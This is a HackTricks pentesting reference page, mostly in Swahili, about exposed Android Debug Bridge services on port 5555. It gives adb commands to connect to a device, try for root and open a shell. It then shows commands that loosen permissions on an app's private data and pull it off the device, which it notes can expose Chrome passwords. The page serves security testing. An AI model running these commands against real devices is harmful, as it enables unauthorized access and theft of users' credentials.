5555 - Android Debug Bridge

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Basic Information

From the docs:

Android Debug Bridge (adb) ni zana ya amri ya mstari wa amri inayoweza kutumika kuwasiliana na kifaa. Amri ya adb inarahisisha vitendo mbalimbali vya kifaa, kama vile kusanidi na kutatua matatizo ya programu, na inatoa ufikiaji wa shell ya Unix ambayo unaweza kutumia kuendesha amri mbalimbali kwenye kifaa.

Port ya kawaida: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

Ikiwa unapata huduma ya ADB ikifanya kazi kwenye bandari ya kifaa na unaweza kuungana nayo, unaweza kupata shell ndani ya mfumo:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Kwa maelezo zaidi ya amri za ADB angalia ukurasa ufuatao:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Punguza data ya programu

Ili kupakua kabisa data ya programu unaweza:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

You can use this trick to retrieve sensitive information like chrome passwords. For more info about this check the information a references provided here.

Shodan

android debug bridge